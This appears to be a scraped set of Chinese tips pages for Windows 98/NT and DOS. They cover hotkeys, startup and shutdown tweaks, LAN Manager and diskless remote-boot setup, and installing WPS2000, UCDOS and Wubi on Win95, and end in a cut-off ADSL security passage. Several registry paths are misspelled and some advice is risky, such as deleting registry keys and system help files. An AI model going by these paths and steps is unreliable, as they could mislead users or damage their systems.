    以Windows Me操作系统为例，首先要找到Windows系统菜单中的“MS-DOS方式”图标，在“开始”菜单中依次点击“程序→附件”找到“MS-DOS方式”，然后用鼠标的右键而不是左键单击此图标，在快捷菜单中选“属性”项，在弹出窗口中进入“程序”选项卡，将光标放在“快捷键”项后的空白处，同时按下键盘上的“Ctrl”、“Alt”和“D”三个键，系统会自动填入快捷键“Ctrl+Alt+D”，点“确定”，就大功告成了（个别系统还需要重新启动Windows系统一次）。

    这个方法通过快捷键执行了其对应的命令行，即COMMAND.COM，这也正是《快速调用DOS窗口》文中介绍的第二个方法的原理，只不过我们给它定义了快捷键。使用时只需直接按下指定的快捷键就可以启动MS-DOS方式了，即便是在应用程序中，也可以直接调用。这里“Ctrl”、“Alt”和“D”三个键是自己定义的，你也可以改成自己喜欢的其他组合键，但Windows要求快捷键必须包含“Ctrl”或“Alt”键以及另外的键，且不能使用“Esc”、“Enter”、“Tab”、“Print Screen”、“Back Space”这些有特殊作用的键，同时最好不要使用与其他程序中使用的组合键冲突的设置，免得自找麻烦。

    这个方法对于所有版本的Windows操作系统都可行，小小的差别在于操作系统默认将MS-DOS窗口的图标放在哪里。推而广之，也可以用这个方法为其他应用程序设置快捷键，比如为常用的Word和Excel分别定义快捷键“Ctrl+Alt+W”和“Ctrl+Alt+E”。


去掉DOS系统配置文件

《一键清理系统垃圾》

去掉DOS系统配置文件

    其中，autoexec.bat与config.sys是DOS时代的两个系统配置文件，在Windows 98则是可有可无，而且如果你不需要在纯DOS下做必要的工作，那么这两个文件可以不要，这样可加快系统的启动，减少资源占用率。

    五、加快系统启动速度

    1、用系统配置程序定制自动选项。

    单击“开始”按钮，选择“运行”，在“打开”输入框内输入msconfig，单击“确定”按钮启动系统配置实用程序，单击“常规”标签项，选定“选择性启动”单选框，在此单选框内只选定“处理System.ini文件”和“处理Win.ini文件”这两个复选框。单击“启动”标签项，这个方框内只选择“ScanRegistry C:\Windows\scanregw.exe /autorun”和需要进行实时监控的防病毒程序等。

    2、删除一些自动加载的程序。

    Windows98在启动时会自动加载一些程序，随着Windows下安装的程序的增多，特别是一些程序在Windows启动时也跟着运行，影响了Windows系统的运行速度。因此我们可以合理地配置这些启动程序，删除一部份不必要自动加载的程序。

    “启动”组中的程序可以通过在“启动”组中指到要删除的启动项，点击鼠标右键进行删除。

    注册表中的自动加载程序，可以通过修改注册表来删除。运行注册表编辑器Regedit，点击并展开HKEY_LOCAL_MACHINE\MICROSOFT\Windows\CURRENTVERSION\Run，选中右边窗口中的Windows初始化后自动加载程序，将它删除；点击并展开HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CURRENTVERSION\RunServices，选中右边窗口中的Windows启动时自动加载程序，将它删除。

    3、取消系统启动系列中的时间延时

    打开“资源管理器”→“编辑”→“文件夹项”→“属性”→设为查看所有文件，退出，在Windows 98启动盘根目录下找到Msdos.sys，在这个文件上右键单击它，并从弹出菜单中选取“属性”项，去掉“只读”和“隐藏”属性，然后单击确定，再用Notepad打开Msdos.sys，在[Options]下，输入一行Boot Delay=0(表示延时0秒)，关闭记事本并保存所做修改，恢复其“隐藏”和“只读”属性，退出并重新启动Windows。

    六、加快系统关机速度

    可能我们已经感受到Windows的关机要等很上几分钟甚至关不了机，怎么办呢？通过以下办法可以解决。

    编辑注册表，在\HKEY_LOCAL_MACHINE\System\Courrent-ControlSet\Control\Shutdown 下创建一个名为 FastReboot 的字符串键，键值为1即可。也可以通过运行Windows实用配置文件msconfig，或是通过点击“开始” →“程序” →附件→系统工具→系统信息，选择工具菜单中的“系统配置实用程序”，点击“高级”按钮，选中“如果关机失败，请禁用磁盘扫描程序”，并不选中“禁用快速关机”即可。

    七、对内存进行优化

    内存是决定系统运行速度的其中一个重要因素，当内存一定的情况下如何减少内存的不必要占用率呢?有很多方法，右击“我的电脑”，打开“属性”→“性能”→“文件系统”→“CD-ROM”，拖动“追加的高速缓存大小”游标至“小”，将“最佳访问方式”设置为“倍速”，这样的设置对现在包含Cache的高速光驱来说影响不大，在不太需要光驱的情况下可以让出更多的内存空间。还有就是减少虚拟磁盘，通过修改System.ini文件中的[vcache]小节，将“MaxFileCache=”后的数值设置一个适当的数（单位为KB）。还有就是一个软件，名叫MagnaRAM97的，可以压缩内存的数据，也就是说你的内存将可以同时处理更多的东西。比起虚拟内存的速度快多了。当然，现在内存比较便宜，多加些就可以解决问题了。

    八、进行硬盘碎片整理

    将硬盘格式从FAT16转换为 FAT32，然后通过“系统工具” →“维护向导”安排定期的硬盘碎片整理。也可以使用一些专门的磁盘碎片整理工具完成碎片整理工作。

    九、关闭活动桌面

    Windows 98的默认窗口是Web窗口，这个窗口既浪费内存又费时间。开启它会降低系统性能、拖慢启动速度。关闭方法是右击桌面，选属性，然后选Web，把“按Web页方式查看活动桌面”和“Internet Explorer频道栏”点掉。不要任何桌面主题，直接在“控制面板”的“文件添加/删除”工具中将桌面主题删除。也不要设置墙纸，因为墙纸会占用大量的内存，增加启动时调图的时间。如果不迫切需要，也不要设置屏幕保护方式，这些都可以在控制面板的“显示”中进行设置。

    十、清理磁盘空间

    1、删除没有使用的应用程序：可以利用控制面板上的“增加/删除程序”完成程序的卸载；也可以通过应用程序自带的卸载程序完成。

    2、删除 “C:\Windows\Temp”目录中的程序安装时的所有文件。

    3、删除Windows目录下的“Temporary Internet Files”文件夹中上网时留下的临时文件。

    4、搜索并删除硬盘上所有无用的备份文件、临时文件、日志文件，如*.bak、*.tmp、*.log等。

    5、删除Windows\Help文件夹中的帮助文件。

    6、删除注册表中无用的注册项。如在“HKET_LOCAL_MACHINE\Software”和“HKET_CURRENT_USER\Software”主键下找到那些已被删除的子键并将其删除；
    在HKET_LOCAL_MACHINE\Software\MicrosoftWindows\CurrentVersion\explore\Tips 下将这些子键全部删除，这是Windows的技巧提示；在HKET_LOCAL_MACHINE\Software\MicrosoftWindows\CurrentVersion\TimeZone下，删除多余的时区，只保留北京时区；在HKET_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboardlayouts中删除不用的输入法。

    7、删除Windows下的临时文件和多余的字体文件。可以通过控制面板上的字体图标程序来查看和删除不需要的字体。


为NT安装Lan Manager V2.0 DOS工作站

《一键清理系统垃圾》

为NT安装Lan Manager V2.0 DOS工作站

  1.将工作站添加到NT服务器的域
     依次在服务器的“开始→程序→管理工具→域用户管理器→用户→新用户”将工作站的计算机名、用户名及所在域或组等有关信息添加到网络中。

    2.制作LAN Manager v2.0安装盘

    方法1：通过“开始→程序→管理工具→网络客户管理器”，选择“制作安装磁盘组”中的“LAN Manager v2.0 for MS－DOS”进行；

    方法2：将Windows NT Server 4.0安装光盘中Client\Lanman\Disks目录下的“Disk1”、“Disk2”、“Disk3”、“Disk4”四个子目录中的文件分别复制到四张软盘中。

    3.安装LAN Manager v2.0到DOS工作站：

    步骤1：将“LAN Manager v2.0”安装盘的第一张磁盘插入驱动器，并运行其中的SETUP程序。出现“Microsoft LAN Manager v2.0 SETUP”画面后按“Enter”键。

    步骤2：出现“Using the keyboard in setup”画面时按“Enter”键。

    步骤3：出现“Install LAN Manager”画面时，若认可安装是从“A：”驱动器进行，并且认可安装目标目录为“C:\LANMAN.DOS”时按“Enter”键。否则，用鼠标或通过“TAB”键将光标移到相应位置进行修改并按“Enter”键确认。

    步骤4：出现“Install LAN Manager”画面时，若认可安装是从“A：”驱动器进行，并且认可安装目标目录为“C:\LANMAN.DOS”时按“Enter”键。否则，用鼠标或通过“TAB”键将光标移到相应位置进行修改并按“Enter”键确认。

    步骤5：出现“Install LAN Manager”的“What do you want to install?”画面时，可直接按“Enter”键选择“LAN Manager Enhanced”安装方式。亦可选择“LAN Manager Basic”安装方式。(Basic式可节约内存，但它所提供的功能较少)。

    步骤6：出现“Insert Disk”的“DOS Drivers 1 in drive A”时将安装盘2换入软驱中，并按“Enter”键。

    步骤7：出现“Network Adapter Drivers”画面时，从“Select Available Network Adapter Driver”列表中选择合适网卡驱动程序。当列表中不包括网卡驱动程序时，按“Alt＋D”键使用“Other Driver”选项配置网卡，同时将包含网卡驱动程序的安装盘换入软驱中，并按“Enter”键。在“Other Network Adapter Drivers”画面中选定并确认网卡驱动程序。之后，在“Network Protocol for”画面中以光标加“空格”键选择网络通讯协议(一般采用Netbeui协议)以安装网卡驱动程序及网络通讯协议。

    步骤8：出现“Workstation Settings”画面时，请在“Computername”选项中输入计算机名，在“Username”选项中输入用户名，在“Domain”中输入计算机所在主域域名，在“Other Domains to Monitor”中输入计算机所在其他域域名或工作组名称(此项可不输)。按“Enter”确认以上各选项有效。

    步骤9：出现“Support for Windows Environment”画面时，在“Run MS－DOS LAN Manager with the Windows Environment?”选项中用光标选择“Yes”或“No”以确定是否在MS－DOS及Windows中与网络连接。

    步骤10：当选中“Yes”确定是在MS－DOS及Windows中与网络连接时，在“Windows Directory”画面中的“Windows Directory[]”选项填入Windows的路径。

    步骤11：在出现“Messaging Popups”画面的选项中选定你是否在Windows及MS－DOS环境下都能运行网络程序。同时在“Configuration Complete”画面保存以上配置。

    步骤12：在出现“Insert Disk DOS DRIVERS 2 in driver A：”画面时，换入“LAN Manager”的第三张盘继续安装至结束。

    至此，在CONFIG.SYS文件中会包含类似如下几行命令：

    DEVICE=C:\LANMAN.DOS\DRIVERS\DOSUTILS\EMM386.EXE NOEMS

    LASTDRIVE=Z

    DOS=HIGH，UMB

    DEVICE=C：\LANMAN.DOS\DRIVERS\PROTMAN\PROTMAN.DOS/i:

    C：\LANMAN.DOS

    DEVICE=C：\LANMAN.DOS\DRIVERS\ETHERNET\ELNK3\ELNK3.DOS

    (此以3C509网卡为例)

    在AUTOEXEC.BAT文件中会包含类似如下几行命令：

    SET PATH=C:\LANMAN.DOS\NETPROG；％PATH％

    NET START WORKSTATION

    LOAD NETBEUI

    [注]若每次开机均要求登录，在此行之下加：

    NET LOGON <USERNAME>＊

    4.配置LAN Manager v2.0的DOS工作站：

    在完成以上安装后重新启动DOS工作站，并记录下“Activating adapter at I/O Port=0x???，INT=xx”即网卡的I/O地址及中断号。然后，用“EDIT”或其他编辑器对“C:\LANMAN.DOS\PROTOCOL.INI”进行相应的修改。具体做法如下：

    在PROTOCOL.INI文件中[NETBEUI_XIF]组里的

    DRIVERNAME=ELNK3＄(此仍以3C509网卡为例)

    ;2nd driver name=ELNK32＄

    之下加上

    ;INTERRUPT=xx(xx为启动时所见到的中断号INT)

    ;IOADDRESS=0x???(0x???为启动时所见到的地址I/O Port)

    重新启动即可完成配置安装。

    当工作站是IBM300GL等自带以太网卡的原装PC机时：

    需要将PROTOCOL.INI文件[NETBEUI_XIF]组中

    BINDINGS=“XXXXXX”所指向的那个组中的

    ;Sample Protocol.INI

    [MS＄CRYSTAL]

    二行删除，并在

    DRIVERNAME=XXXXXXX

    之下加上

    ;INTERRUPT=xx(xx为启动时所见到的中断号INT)

    ;IOADDRESS=0x???(0x???为启动时所见到的地址I/O Port)

    重新启动即可完成配置安装。

    5.配置LAN Manager v2.0的网络命令：

    1、NET

    运行网络连接程序

    2、NET/?

    查看NET命令的用法

    3、NET LOGON

    登录网络

    4、NET LOGOFF

    注销网络

    5、NET VIEW \\NTSERVER

    观察服务器NTSERVER中的共享资源

    6、NET USE F： \\NTSERVER\WORK

    将网络驱动器F：连接到服务器NTSERVER中的共享资源，其共享名称为WORK

    7、NET USE

    观察网络驱动器及网络打印机连接状况

    8、NET USE F： /DELETE

    删除网络驱动器F：

    9、NET USE LPTn: \\NTSERVER\HP－4VC

    将服务器NTSERVER上的HP－4VC作为网络共享打印机连接到本机的LPTn端口上

    10、NET USE LPTn: \\NTSERVER\HP－4VC/PERSISTENT:NO

    更改网络打印机连接设置

    11、NET USE LPTn: /DELETE

    中断所连接的网络打印机

返回


在NT网络中使用DOS无盘站

《一键清理系统垃圾》

在NT网络中使用DOS无盘站

    无盘站顾名思义就是不使用本机磁盘驱动器的计算机工作站。这种计算机工作站在我国以其低配置低价格的优势被广泛用于邮电、证券等行业。无盘站在使用时必须连接入网络并配备至少一台网络服务器，如今应用最多的无盘站网络环境是NetWare。然而伴随Windows NT的兴起，无盘站也越来越多地成为Windows NT网络应用中的一种需求。
    Windows NT网络中无盘站的支持依靠的是远程启动服务。所谓远程启动是指计算机启动时不使用自己的操作系统，而是利用网络中远端服务器上提供的程序来启动计算机。远程启动不仅能用于无盘站，也可用于有盘站。有盘站使用远程启动的好处是易于进行网络控制和集中管理软件。
    由于无盘站的硬件配置相对较低（如处理器、内存等），所以我国针对无盘站的应用多以DOS环境为主。然而遗憾的是，有关Windows NT网络的资料中对无盘站使用的介绍都不多，Windows NT联机文档中对此内容的帮助也描述甚少，本文以实例介绍在Windows NT网络环境下的DOS无盘站的使用配置步骤。
    通常情况下，第一次配置无盘站首先要在工作站上进行硬件安装，然后在服务器上进行协议安装、服务安装、启动服务、配置网络驱动程序、配置网卡供应商参数、配置启动模块、定义映射文件、创建启动配置目录及文件、创建工作站等几步，最后完成无盘站的启动。
    第一步硬件安装。要想利用网络从远程启动计算机，工作站上使用的网卡必须装配有适用于Windows NT网络的远程程序加载芯片（RPL ROM），该芯片中的远程初始化程序加载（RPL）模块在工作站启动时从服务器中检索用于工作站启动和配置的软件，没有此芯片就无法支持网络启动。另外安装时要了解工作站使用的网卡的品牌型号及网卡ID号，一般工作站计算机在用网络启动时屏幕上会列出此ID号，如果屏幕上没有列出，则需使用网卡随带的设置软盘检测出网卡ID号。网卡ID号是一个十二位的16进制数字，用户要记录下此号。
    第二步安装DLC协议。DLC协议即数据链路控制协议，它作为一种接口被在网络的数据链路层中定义，在使用远程启动服务时必须安装DLC协议。注意此协议不提供转发程序的使用，因此只能作为辅助协议来使用，例如计算机在访问IBM主机系统或访问网络中自带网卡的打印机时，将使用到DLC协议。安装DLC协议在“控制面版”的网络设置程序中进行，运行网络设置程序并添加协议，然后在网络协议列表中选择安装“DLC通讯协议”。安装时系统需要用到Windows NT的发行盘。
    第三步安装远程启动服务。服务是网络运行的必要保证之一，即使网络设备和协议驱动都齐全，如果没有网络服务，各计算机之间也无法交流。服务是由一方提供给另一方或多方的，提供服务的一方叫服务方或服务器，使用服务的一方叫客户方或客户机。远程启动服务就是在网络服务器上运行的为远程启动工作站提供支持的服务程序。与安装网络协议一样，在“控制面版”的网络设置程序中添加新的服务，并在网络服务列表中选择安装“远程启动服务”。安装远程启动服务时，安装程序要在服务器上创建一个用于此服务的文件夹，以后在远程启动配置时将以此文件夹作为根目录，默认安装的文件夹为%SystemRoot%\RPL。另外安装还需要用户指定远程启动客户源文件的位置，一般这些源文件在Windows NT发行盘的Client\RPL文件夹中。
    第四步启动远程启动服务。服务程序只有运行起来才能提供其应有的功能。新安装的远程启动服务被系统定义为手工启动，定义为手工启动的服务在Windows NT系统启动时不会被自动启动，只有用户手工激活或其它服务程序需要它时，该服务才启动。要想在系统启动后远程启动服务也被启动，应通过“控制面版”的服务设置程序将远程启动服务的启动属性改为自动启动。
    经过以上三步后，再重新启动服务器计算机。系统已经建好了RPL文件夹，远程启动服务也可以使用了。
    第五步配置网络驱动程序。在远程启动服务器上需要有支持工作站上安装的网卡的网络驱动接口程序文件和远程启动模块及协议配置文件。网络驱动接口程序必须支持网络驱动程序接口规范（NDIS），这一规范是一种定义在协议驱动程序与网卡之间的网络层次间统一接口，它包绕在每一个网卡驱动程序周围，从而使网卡与协议无关，提供允许多网卡与多协议共存的标准，这样用户就可以使用网卡驱动程序和协议的任意组合。Windows NT使用NDIS 3.0版本。远程启动模块及协议配置文件定义远程启动的驱动程序、执行程序和信息程序等。如果工作站使用的网卡支持Windows NT的远程启动，这些需要的文件就在网卡的随附软盘中，否则应该在服务器的BBlock文件夹中找到与该工作站网卡兼容的相应程序。以下以国产COMDA AN16网卡为例配置远程启动。首先将工作站网卡的网络驱动接口程序*.DOS文件拷贝到BBlock\NDIS文件夹中，其次在BBlock\Netbeui下创建一个工作站网卡使用的文件夹，文件夹名自定，如AN16，再将工作站网卡的DOSBB.CNF和PROTOCOL.INI文件拷入此新建文件夹。例如：COMDA AN16网卡不带有所需的文件，但它是与NE2000网卡兼容的网卡，这样就可以把NE2000.DOS文件拷贝成为AN16.DOS文件，把服务器NE2000文件夹中的文件拷入AN16文件夹中。最后用文本编辑器编辑AN16文件夹中拷入的DOSBB.CNF文件，把其中关于PROTOCOL.INI和NDIS驱动程序的路径改为实际的正确路径，如将NE2000\PROTOCOL.INI改为AN16\PROTOCOL.INI、将NDIS\NE2000.DOS改为NDIS\AN16.DOS等。
    第六步配置网卡供应商参数。执行Windows NT服务器%SystemRoot%\System32文件夹中的rplcmd.exe程序，该程序是远程启动的配置程序。按“V”键并回车配置网卡供应商参数，程序询问是添加（Add）、删除（Del）还是查看（Enum）供应商明细，按“A”键增加新的供应商。需要设置的供应商参数是供应商名（VendorName）和供应商说明（VendorComment），其中供应商名代表某一供应商提供的一系列产品，在这里该名就是网卡ID号的前六位数字（16进制数），供应商说明可由用户任意输入。例如输入VendorName=0088CC，VendorComment=COMDA-AN16。
    第七步配置远程启动模块。执行rplcmd.exe程序，按“B”键并回车添加新的启动模块配置。需要设置的参数有：启动名称（BootName）、供应商名（VendorName）、启动模块配置文件的路径（BbcFile）、启动模块注释（BootComment），其中启动模块配置文件就是前面第五步中制作的DOSBB.CNF文件。这里需要注意的是，路径的定义要相对以远程启动目录（第三步安装远程启动服务时创建的RPL文件夹）为根目录。例如输入如下配置：BootName=AN16B，VendorName=0088CC，BbcFile=Bblock\Netbeui\AN16\DOSBB.CNF，BootComment=COMDA-AN16 Boot Block。
    第八步定义映射配置文件。运行rplcmd程序，按“C”键并回车添加映射配置。要求输入：映射的配置名（ConfigName）、启动名称（BootName）、工作站目录（DirName）、工作站目录的映射目录（DirName2）、共享映射配置文件路径（FitShared）、个人专用映射配置文件路径（FitPersonal）、配置注释（ConfigComment）等。例如：ConfigName=AN16-DOS622，BootName=AN16B，DirName=DOS，DirName2=DOS622，FitShared=Fits\DOS622.Fit，FitPersonal=Fits\DOS622P.Fit，ConfigComment=AN16 DOS 6.22 Fits Config。在服务器Fits文件夹下的*.Fit文件是纯文本文件，其内定义了远程工作站上使用的文件及目录对应于服务器中的位置，如工作站C盘根目录的映射位置，C盘DOS目录的映射位置等等，修改这些Fit文件可以指定不同的映射关系。另外Fit文件中有一些以括号引用的变量，如(PROFILE)是指远程启动配置文件名、(CNAME)是远程启动工作站的工作站名、(BINFILES)指共享的可执行文件目录，等等，具体这些变量的含义可以参见Fits目录中的default.fit文件。
    第九步创建远程启动配置文件及目录。执行rplcmd程序，按“P”键并回车添加新的远程启动配置文件。需配置的主要参数是远程启动配置文件名（ProfileName）和使用的映射配置名（ConfigName）。其中使用的映射配置是在上面第八步中建立的操作系统与网卡的组合关系。例如输入：ProfileName=AN16，ConfigName=AN16-DOS622。进行完成这一步后，系统在服务器RPLfiles\Profiles文件夹下创建了一个以远程启动配置文件名命名的新文件夹AN16，根据第八步所述Fit文件的定义（如果用户没有重新修改Fit文件的话），AN16文件夹将成为以后远程DOS无盘站的C盘根目录。另外AN16文件夹下的DOS子目录是空的，但依照映射定义，无盘站的DOS目录已经映射到RPLfiles\Binfiles\DOS622文件夹，而且DOS引导文件也被映射到此DOS622文件夹中，所以要将MS-DOS 6.22的启动引导文件IO.SYS、MSDOS.SYS和Command.com拷贝到此DOS622文件夹内，否则无盘站会因没有操作系统而无法启动。
    上面四步中，在使用rplcmd.exe程序时对于不必需输入的参数项，只要按回车键跳过即可。
    第十步创建工作站记录。进行完成以上九步后，从Windows NT“开始”菜单执行“管理工具”内的“远程启动管理器”程序（%SystemRoot%\System32\rplmgr.exe），在配置文件窗口中就已经列出了第九步创建的配置文件名（ProfileName）。此时将已安装好相应网卡的无盘站连入网络并开机，服务器上的远程启动服务将会收到工作站网卡发来的信号，并把这一工作站网卡的连接信息显示在远程启动管理器的工作站窗口内，其中列出了该网卡的ID号。先选中这一网卡连接，然后从“远程启动”菜单中执行“转换适配器(A)…”，并添加工作站名和密码（由用户自定），系统就会把此网卡连接记录转化为工作站记录加入到远程启动数据库中。创建工作站的工作会在服务器RPLfiles\Machines文件夹下建立一个以工作站名称命名的文件夹，根据映射关系这是使用无盘站的用户可读写和更改文件的地方。创建工作站成功后，无盘站就能启动了，输入正确的工作站密码，无盘站开始从映射的引导路径启动DOS操作系统。
    创建工作站记录的工作也可以利用rplcmd程序的“W”命令来完成。
    配置无盘站的关键，一个是网卡供应商参数，一个是映射关系，包括网卡与启动模块的映射、网卡与操作系统的映射以及配置文件与工作站的映射等。其中的难点是各种映射关系，如：启动系统、文件类型、启动文件路径、网络文件路径、临时文件路径等等，掌握好这些关系就可以顺利地配置无盘工作站。
    以上步骤能够适用于大多数DOS无盘站连接情况，但对于那些已经由Windows NT提供了供应商参数和启动模块与映射配置的网卡（例如3COM EtherLink III供应商名0020AF、Intel EtherExpress PRO供应商名00AA00等等），就可以省略一些配置步骤，创建远程启动配置文件及目录的工作也只需在远程启动管理器里运行“远程启动”菜单中的“新的配置文件(P)…”即可。

返回


怎样在无盘WIN95网络中安装WPS2000、UCDOS和五笔输入法

《一键清理系统垃圾》

返回总目录 上一页 目录页

怎样在无盘WIN95网络中安装WPS2000、UCDOS和五笔输入法

    在WIN95无盘站网络上安装WPS2000、UCDOS和五笔字型的过程中，笔者曾遇到了一些困难。但通过摸索和尝试最终解决了这些困难，使这几种软件在WIN95无盘站网络中得以正常安装和使用。下面，本文将对安装的具体方法进行介绍。用该方法建成的一个无盘WIN95教学网已正常运行了半年多时间。
一. 怎样在无盘 WIN95 工作站上安装WPS2000(安装WPS97也类似) ?

安装之前，先在NT服务器上建立一个目录(如OFFWORK)，并共享出来(如共享为OFFWORK)。
启动一台WIN95工作站(有盘、无盘均可)，登录到NT服务器上。并在“网上邻居”中将上面建立的共享目录映射为一个驱动器(如J:)。
接下来，才开始执行WPS2000安装光盘放上的setup.exe设置程序(可将服务器光驱共享出来)，选择安装WPS2000。当“设置”对话框的进度条跑到90%～100%时，可能会死机(在无盘WIN95上是必然)。
这时，请不要着急。请先按Ctrl+Alt+Del组合键，当弹出“关闭程序”对话框时(见图2)，直接按“结束任务”按钮，接下来还会弹出一个“_delis[没有响应]”对话框，再按“结束任务”，便可结束没有响应的“_delis”程序。
然后请赖心地等上一会儿，你便会欣喜地看到“安装金山WPS2000专业版”画面，WPS2000奇迹般地开始安装。以后便可按正常方式，一路顺风地将WPS2000安装到NT服务器上。
安装完成后，如果在运行WPS2000时找不到已经安装的新字体，可以到无盘WIN95工作站的控制面板中刷新字体，使无盘WIN95侦测到已经安装的新字体即可。在运行“金山艺术汉字”时，应将字库路径修改为WIN95共享目录下的FONTS子目录，在笔者的网络中是F:\WIN95\FONTS。
二. 怎样在无盘WIN95中安装五笔输入法 ?

1. 第一种方法是，首先在一个有盘WIN95上安装好五笔输入法，将其wbx.ime、wbx.mb两个文件拷贝到NT服务器上WIN95的共享目录中system子目录下，在笔者的网络中是F:\WIN95\SYSTEM。

其次，编制一个用于修改无盘WIN95注册表的文件WBX.REG，其内容如下： REGEDIT4

[HKEY_LOCAL_MACHINE\System\
CurrentControlSet\control\Keyboard Layouts\E0200804]
"IME file"="WBX.IME"
"layout text"="五笔字型"
"layout file"="kbdus.kbd"

[HKEY_USERS\.Default\Software
\Microsoft\Windows\CurrentVersion\五笔字型]
"词语联想"=dword:00000001
"词语输入"=dword:00000001
"逐渐提示"=dword:00000001
"外码提示"=dword:00000001
"插空格"=dword:00000000
"光标跟随"=dword:00000001
"< SPACE >"=dword:00000001
"< ENTER >"=dword:00000000

注意，在此之前最好不要在无盘WIN95上安装任何输入法。否则上面的“E0200804”就要依次递增为“E0210804”、“E0220804”等，这要视注册表原有最大数字而定，该数字至少应比原有最大数字大1。

再次，在无盘WIN95上运行注册表编辑器F:\WIN95\REGEDIT.EXE，将上面编制的WBX.REG文件引入注册表，并重新启动无盘WIN95。

最后，便可打开无盘WIN95“控制面板”中的“输入法”程序，直接“添加”“五笔字型” 输入法。

当然，这种方法烦琐且危险，在修改注册表之前最好先将其导出备份。该方法是在以前的五笔字型不能在无盘WIN95中正常安装的情况下，采取的一种方法。该方法也可用于在有盘WIN95中手工添加各种输入法。

2、 第二种方法是，用现在新版的WPS2000光盘中所带的王码五笔直接在无盘WIN95工作站上安装，本方法已试验成功。

三. 怎样在无盘WIN95中正常运行UCDOS ?

UCDOS是DOS下的程序，要用到COMMAND.COM，但Win 95无盘站的MS-DOS方式不能正常运行。要解决这一问题，可将无盘WIN95共享目录下的COMMAND.COM文件拷贝到F:\WINNT\rpl\rplfiles\binfiles\WIN95目录下，覆盖原有文件即可。这里的F:\WINNT是NT的安装目录，rpl是远程启动服务的安装目录，读者应根据自己网络的具体情况来修改这两个参数。
启动一台WIN95无盘站，以拥有改写权限的用户登录到NT服务器上。然后运行UCDOS 的安装程序INSATLL.EXE，将UCDOS7.0安装到网络服务器中，如 \\NTSERVER\offwork\UCDOS(映射为J:\UCDOS)；
找一份UCDOS98，将全部文件(包括子目录)都拷贝到已安装好的UCDOS目录之中，全部覆盖原有的文件。
在已安装好的UCDOS目录之中建立一个批处理文件UCWPS.BAT，其内容如下：
@ECHO OFF
J:
CD\UCDOS
RD16.COM
KNLVGA.EXE
PY.COM
LIMD WB
RDFNT.COM
WPS.COM
QUIT.COM
EXIT

其中，J：盘是笔者网络中UCDOS所在的网络盘(\\NTSERVER\OFFWORK)，在不同的网络中应作相应的修改。KNLVGA.EXE是从UCDOS98中拷贝过来的，用于取代原有的 KNL.COM，这个KNL.COM 便是原UCDOS7.0在WIN95中不能正常运行的罪魁祸首。UCDOS.BAT和UP.BAT也可参照进行相应的修改。当然，这些批处理文件的内容还可根据读者的需要进行适当的修改。

5. 进入WIN95无盘站，在桌面上建立一个快捷方式UCWPS，使其指向上面建立的批处理文件UCWPS.BAT。再打开该快捷方式的“属性”窗口，选择“程序”子窗口，在“退出时关闭(X)”一项前打勾，按“确定”退出。这样，在桌面上双击该快捷方式便可正常进入UCDOS下的WPS，退出WPS又可自动返回WIN95桌面，从而实现了UCDOS在无盘WIN95中的正常运行。

返回


dos

《一键清理系统垃圾》

返回总目录

dos

◎Cisco路由器上如何防止DDoS
◎DOS的常用命令（二）
◎DOS的常用命令（三）
◎DOS的常用命令（一）
◎DOS命令八大经典案例
◎Dos命令全集　(Ant)
◎DOS命令全集
◎DOS命令全集
◎DOS如何安装tcp/ip协议，用来运行FTP,TELNET等
◎在DOS下安装Win XP
◎DOS下一些命令在网络环境中的应用
◎在DOS中使用系统还原工具
◎MS-DOS信息英汉对照 计算机英语强化
◎SCO XENIX Ver2.3.4中两个有用的DOS拷贝命令
◎在Windows 2000使用纯DOS的方法
◎在Windows XP中运行DOS程序
◎从DOS启动TurboLinux
◎对照DOS学Linux的基本命令
◎禁用指定DOS命令办法
◎快速安装中文Windows NT 4.0下的DOS工作站
◎快速调用DOS窗口的简便方法
◎去掉DOS系统配置文件
◎如何在DOS下自动刷新BIOS
◎为NT安装Lan Manager V2.0 DOS工作站
◎在NT网络中使用DOS无盘站
◎在Windows 2000使用纯DOS的方法
◎在Windows XP中运行DOS程序
◎怎样在无盘WIN95网络中安装WPS2000、UCDOS和五笔输入法

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


ADSL防御黑客攻击的十大办法

《一键清理系统垃圾》

返回总目录 目录页 下一页

ADSL防御黑客攻击的十大办法

    目前，使用ADSL的用户越来越多，由于ADSL用户在线时间长、速度快，因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”，要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢？不妨看看以下方法。

    一、取消文件夹隐藏共享

    如果你使用了Windows 2000/XP系统，右键单击C盘或者其他盘，选择"共享"，你会惊奇地发现它已经被设置为“共享该文件夹”，而在“网上邻居”中却看不到这些内容，这是怎么回事呢？

    原来，在默认状态下，Windows 2000/XP会开启所有分区的隐藏共享，从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”，就可以看到硬盘上的每个分区名后面都加了一个“$”。但是只要键入“\\计算机名或者IP\C$”，系统就会询问用户名和密码，遗憾的是，大多数个人用户系统Administrator的密码都为空，入侵者可以轻易看到C盘的内容，这就给网络安全带来了极大的隐患。

    怎么来消除默认共享呢？方法很简单，打开注册表编辑器，进入“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Sevices
\Lanmanworkstation\parameters”，新建一个名为“AutoShareWKs”的双字节值，并将其值设为“0”，然后重新启动电脑，这样共享就取消了。

    二、拒绝恶意代码

    恶意网页成了宽带的最大威胁之一。以前使用Modem，因为打开网页的速度慢，在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快，所以很容易就被恶意网页攻击。

    一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序，只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。

    运行IE浏览器，点击“工具/Internet选项/安全/自定义级别”，将安全级别定义为“安全级-高”，对“ActiveX控件和插件”中第2、3项设置为“禁用”，其它项设置为“提示”，之后点击“确定”。这样设置后，当你使用IE浏览网页时，就能有效避免恶意网页中恶意代码的攻击。

    三、封死黑客的“后门”

    俗话说“无风不起浪”，既然黑客能进入，那说明系统一定存在为他们打开的“后门”，只要堵死这个后门，让黑客无处下手，便无后顾之忧！

    1.删掉不必要的协议

